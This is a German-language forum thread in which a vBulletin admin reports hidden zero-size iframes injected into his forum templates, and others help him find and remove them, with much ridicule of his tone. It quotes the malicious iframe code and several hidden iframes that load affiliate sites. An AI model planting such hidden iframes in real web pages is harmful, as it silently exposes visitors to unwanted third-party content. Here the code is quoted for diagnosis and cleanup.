Liebe Leute!

Irgendwie ist es möglich ein IFrame ins vBulletin 3.6 einzuschleusen!!!!:mad:

Auch schon in der Vorgängerversion!

<html><iframe width=0 height=0 frameborder=0 src='http://www.o00o.info/portal/index.php?aff=soauker' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe><html><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="de">
<head>

Da will einer Geld verdienen. Wie er das gemacht hat ist mir unbekannt.

Zu sehen im Quelltext:

http://www.realhomepage.de/forum/


Es sollte mal jeder Nutzer von vBulletin im Quelltext nachsehen.........

Ich bitte um Hilfestellung!

ARTOS

Hallo artos,

Schaue bitte, ob dieser Code nicht in deinem "header" Template drin steckt. Das ist auf keinem Fall ein Bug oder Sicherheitsloch in vBulletin, sondern jemand hat den Code dort hin plaziert.

Falls Sie weitere Hilfe benötigen, starten Sie bitte ein Ticket im Kundenbereich.

http://members.vbulletin-germany.com/membersupport_contactform.php

Scott

Hallo artos,

Schaue bitte, ob dieser Code nicht in deinem "header" Template drin steckt. Das ist auf keinem Fall ein Bug oder Sicherheitsloch in vBulletin, sondern jemand hat den Code dort hin plaziert.

Falls Sie weitere Hilfe benötigen, starten Sie bitte ein Ticket im Kundenbereich.

http://members.vbulletin-germany.com/membersupport_contactform.php

Scott

Du bist ein kleiner Witzbold. Ich habe vB neu installiert und keine Veränderungen vorgenommen.

Nehmt zur Kenntnis, das ein Sicherheitsloch besteht.

Dann können wir weiterreden.... Du sprichts hier mit keinem Studenten......

Gebt mir bitte die Information, wie man die Sache los wird.

ARTOS

Eine Neuinstallation ist das nicht. ;) Hast du Hacks/Plugins installiert?
Komischerweise ist der Code vor dem Doctype...

BTW: Bei mir ist der Code nicht im Quelltext.

Eine Neuinstallation ist das nicht. ;) Hast du Hacks/Plugins installiert?
Komischerweise ist der Code vor dem Doctype...

BTW: Bei mir ist der Code nicht im Quelltext.

Richtig: Update einer alten Version!
Alle Files wurden überschrieben.

Wo finde ich das "header" Template?

ARTOS

Gucke mal:

AdminCP -> Styles & Templates -> Styles verwalten -> Alle Style Einstellungen -> 'Los'

HTML-Doctype

Sollte so ausschauen:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

Gucke mal:

AdminCP -> Styles & Templates -> Styles verwalten -> Alle Style Einstellungen -> 'Los'

HTML-Doctype

Sollte so ausschauen:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

Ich finde folgendes:

header :


<!-- logo -->
<a name="top"></a>
<table border="0" width="$stylevar[outertablewidth]" cellpadding="0" cellspacing="0" align="center">
<tr>
<td align="$stylevar[left]"><a href="$vboptions[forumhome].php$session[sessionurl_q]"><img src="$stylevar[titleimage]" border="0" alt="$vboptions[bbtitle]" /></a></td>
<td align="$stylevar[right]">
&nbsp;
</td>
</tr>
</table>
<!-- /logo -->

<!-- content table -->
$spacer_open

$_phpinclude_output

Viel Spaß Jungs....

ARTOS

Ein bisschen arrogant dafür, dass du Hilfe erwartest oder?

Gucke mal:

AdminCP -> Styles & Templates -> Styles verwalten -> Alle Style Einstellungen -> 'Los'

HTML-Doctype

Sollte so ausschauen:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

Mach doch mal das, was ich dir sage. :rolleyes:

Ein bisschen arrogant dafür, dass du Hilfe erwartest oder?


Hier geht es nicht um Hilfe, es geht um eine Sicherheitslücke.
Nachtrag: Oder Vorgängerversionen nach Update.
vBulletin 3.6 ist ausreichend gut beschrieben. Eine richtig gute Software.

Dennoch: Ich glaube nicht, daß nur ich betroffen bin.....

ADM

Du willst also keine Infos/Hilfe (zu der "Lücke") o.Ä.?
Aha...

Gebt mir bitte die Information, wie man die Sache los wird.

Du willst also keine Infos/Hilfe (zu der "Lücke") o.Ä.?
Aha...


Ich will Informationen von Leuten, die richtig Ahnung haben.


Gruß aus Berlin ARTOS

Ich will Informationen von Leuten, die richtig Ahnung haben.


Gruß aus Berlin ARTOS

Ist Dir schon angeboten worden:
http://www.vbulletin-germany.com/forum/showpost.php?p=159608&postcount=2

:cool:

Ist Dir schon angeboten worden:
http://www.vbulletin-germany.com/forum/showpost.php?p=159608&postcount=2

:cool:

Nun gut: Ich habe Deinem Rat gefolgt.


Gruß aus Berlin ARTOS

Liebe Leute!

Um das klar zu sagen:

Das Forum ist nach dem Update vBulletin 3.6
auseinandergenommen worden!


Es gibt ein Problem!

Have a lot of fun... ARTOS

Da scheinst du wohl der Einzige zu sein.

Ich will Informationen von Leuten, die richtig Ahnung haben.


Gruß aus Berlin ARTOS

@all Bitte glaubt mir NICHT alle Berliner sind so.
Muss man sich ja langsam für solche Spaßvögel entschuldigen.
Nein ich bin schon lange kein Student mehr aber bei solchen Tönen kümmere ich mich auch nicht um die Probleme anderer.
Vielleicht hat er sich nur verlaufen und wollte ins wbb Supportforum :D:D:D

@all Bitte glaubt mir NICHT alle Berliner sind so.
Muss man sich ja langsam für solche Spaßvögel entschuldigen.
Nein ich bin schon lange kein Student mehr aber bei solchen Tönen kümmere ich mich auch nicht um die Probleme anderer.
Vielleicht hat er sich nur verlaufen und wollte ins wbb Supportforum :D:D:D

xDD

@Prob: hab spontan ne Lücke gefunden - dein PW xD

Falls der Code nicht im DOCTYPE steht, wovon ich auch ausgehe, dann versuch folgendes:

ACP -> Styles -> Template durchsuchen -> nach iframe suchen

Dann sollte ein Template angezeigt werden in dem iframe steht.

Dann einfach rauslöschen.

Hallo

Ich habe jetzt ein Update gemacht. -> 361

Das IFrame ist jetzt weg. Fragt sich nur wie lange?

Und noch ein paar Informationen:
Iframe Source:

HTML-Code:
<iframe width=0 height=0 frameborder=0 src='http://www.o00o.info/portal/index.php?aff=soauker' marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe>
War zu finden in folgenden Templates:

SHOWTHREAD
FORUMHOME


Seiten die im Iframe nachgeladen werden:

HTML-Code:
<iframe width=0 height=0 src=http://www.donefind.com/smartppc/portal.php?affzb=1&username=yoho></iframe>
<iframe width=0 height=0 src=http://www.searchfox.us/psearch/portal.php?affzb=1&username=soauker></iframe>
<iframe width=0 height=0 src=http://ppc.goldlook.net/search1/portal.php?username=xml></iframe>

Weitere Seiten die infected sind, bzw. waren oder dasselbe Problem hatten:
http://www.scancapecod.us/messageboard/showthread.php?p=27854
http://66.249.93.104/search?q=cache:S-aUwlzoxKIJ:www.spk-ts.de/index.php%3Fpage%3Dkontakt%26col%3Dallg+soauker&hl=de&gl=de&ct=clnk&cd=20&client=opera
http://www.joomlaportal.fi/component/option,com_smf/Itemid,99999999/topic,3539.msg8743
und noch viele mehr ^^



Gruß aus Berlin Artos

Weitere Seiten die infected sind, bzw. waren oder dasselbe Problem hatten:
http://www.scancapecod.us/messageboard/showthread.php?p=27854
http://66.249.93.104/search?q=cache:S-aUwlzoxKIJ:www.spk-ts.de/index.php%3Fpage%3Dkontakt%26col%3Dallg+soauker&hl=de&gl=de&ct=clnk&cd=20&client=opera
http://www.joomlaportal.fi/component/option,com_smf/Itemid,99999999/topic,3539.msg8743
und noch viele mehr ^^



Gruß aus Berlin Artos

Wobei das 1. ein 3.5.4 ist , der 2. Link kein Board und das 3. ein SMF Forum und ich kenne bisher keinen der so ein Problem hat.

Das bestätigt nur, dass du Opfer von etwas geworden bist, das scheinbar Plattformübergreifend ist. Niemand würde sich die Mühe machen verschiedene Ssteme zu hacken, sondern würde sich dann nur auf ein einziges konzentrieren.

Vielleicht das Resultat der Ausnutzung eines Bugs in einem anderen Script.

Noch ne Info. (http://www.joomla-austria.at/forum/topic,284.msg1285)
Leider kein Hinweis wo genau die Lücke ist, zumindest kann ich damit nichts anfangen. :)

Einzig gemeinsames Merkmal ist PHP. Liegt vielleicht eher an der Serverkonfiguration als an einer bestimmten verwendeten Software?

wenn man mal in Google sucht, sind zum Großteil nur Seiten betroffen die Joomla oder Xoops als Portal nutzen also ist da wohl die Lücke zu suchen

Ein etwas anderer Ton sollte hier schon angeschalgen werden. Dieser Angriff hat nix mit dem vBulletin zu tun. Das sollte schon mal klar sein. Auch wenn Du noch so rumpöbelst, musst Du den Fehler schon mal selber suchen und nicht gleich auf die Forumsoftware rumhacken. Ein bisschen mehr Anstant wäre wirklich dringend nötig!

Wenn Du mal aufmerksam diesem Link: http://www.joomla-austria.at/forum/topic,284.msg1285 gefolgt wärest und ein bisschen Googlen würdest, wäre auch sicherlich Dir aufgefallen, das andere Systeme betroffen sind. Diese Sicherheitslücken sind dann eventuell bei deinem Hoster zu suchen und nicht im vBulletin.

Aber mit solch einem Ton hier wirst Du keine Hilfe bekommen und auch deine Behauptungen solltest Du erstmal beweisen, bevor Du hier so einen Wind machst.

Volle Zustimmung. Unglaublicher Ton für jemanden, der hier seit fast 2 Jahren registriert ist. Ausserdem sollte jemand, der eine solche Seite betreibt, doch eigentlich ein bisschen Ahnung haben.

Anstant tststs :D:D:D

Volle Zustimmung. Unglaublicher Ton für jemanden, der hier seit fast 2 Jahren registriert ist. Ausserdem sollte jemand, der eine solche Seite betreibt, doch eigentlich ein bisschen Ahnung haben.

*hüstel* *hüstel*

Es ist geil ein Webmaster zu sein, es ist geil ein Admin zu sein, so richtig Admin/Webmaster zu sein, so richtig wissend und gemein ... (frei nach dem Lied, es ist geil ein A.... zu sein)

Entschuldigt, musste ich mal los werden. :D


Gruß Stöbi

Hab eigentlich schon drauf gewartet Stöbi :)

Volle Zustimmung. Unglaublicher Ton für jemanden, der hier seit fast 2 Jahren registriert ist. Ausserdem sollte jemand, der eine solche Seite betreibt, doch eigentlich ein bisschen Ahnung haben.


Echt.....??
Nun ja: Ich hab mal sicherheitshalber admincp mittels .htaccess zusätzlich gesichert.
Wir werden sehen.

Gruß aus Berlin Artos

Vielleicht das Resultat der Ausnutzung eines Bugs in einem anderen Script.

Ja! Das könnte auch in Frage kommen.......

Gruß aus Berlin Artos

Nun ja: Ich hab mal sicherheitshalber admincp mittels .htaccess zusätzlich gesichert.

Eine gute Idee.
Ich gebe zu, das ich mit .htaccess noch ziemlich auf den Kriegsfuss stehe.
Könntest Du das bitte mal hier reinstellen?
Zum abkupfern .... :)

Gruss
DSF

Eine gute Idee.
Ich gebe zu, das ich mit .htaccess noch ziemlich auf den Kriegsfuss stehe.
Könntest Du das bitte mal hier reinstellen?
Zum abkupfern .... :)

Gruss
DSF

Das hilft:


http://www.drweb.de/scope/scope.php?scopeform_sterm=.htaccess&imageField.x=38&imageField.y=14


Genauer:
http://www.drweb.de/htaccess/zugriffsschutz_1.shtml


Gruß aus Berlin Artos

Hab eigentlich schon drauf gewartet Stöbi :)
:) Wenn wir alle wissend wären, bräuchten wir, einschliesslich mich, ja nicht die Hilfe der geduldigen Poster wie du und etliche andere hier sind, ja nicht. Ich mag nur gerne immer wieder darauf hinweisen, das ein Titel absolut nichts bedeutet. Ich habe nicht mal Respekt vor mir selbst. ;-)

Sorry für Offtopic, aber trotzdem sehr interessanter Thread.


Gruß Stöbi

@Stöbi meine Bemerkung war in keinster Weise abwertend gemeint sondern ironisch :D

*hust* @Artos mal lesen
http://www.heise.de/newsticker/meldung/78604

Achte auf die Stelle mit den Iframes ;)

*hust* @Artos mal lesen
http://www.heise.de/newsticker/meldung/78604

Achte auf die Stelle mit den Iframes ;)

HarHar ich mach mich nass.

Das sagt nun einiges.

BTW : /me ebenfalls aus Berlin ist, aber davon möchte ich mich nun auch distanzieren. *grinselgruß*

Muhaaaa ich mach mich nass, vlt. ersmal googeln & dann eine Welle machen. Von wegen kein Student mehr! Scheint wohl so, als währe im nun die Luft ausgegangen. Leute gibts im Internet.:eek:

Tja ... Berlin ist halt eine großem Stadt ... Und ist die Gruppe noch so klein, einer muss der Kasper sein ... Unser heutiger heisst: Artos

Klar, erst einmal die Welle machen und unwirsch mit Beschimpfungen um sich wefen - um dann kleinlaut später den Schwanz sowas von einziehen zu müssen :D Zumindest kann man ja aus der Sache etwas lernen und beim nächsten Mal etwas neutraler anfragen :)

HarHar ich mach mich nass.

Das sagt nun einiges.

BTW : /me ebenfalls aus Berlin ist, aber davon möchte ich mich nun auch distanzieren. *grinselgruß*

soso, sollt ich mal Deine Seite besuchen

@alluidh
den muß ich mir merken. *lach*

BTW : Das Thema sollte man schließen denke ich. Sonst artet das aus hier.*grins*

soso, sollt ich mal Deine Seite besuchen

Du bist herzlichst eingeladen:)

Also tue Dir keinen Zwang an. *lach*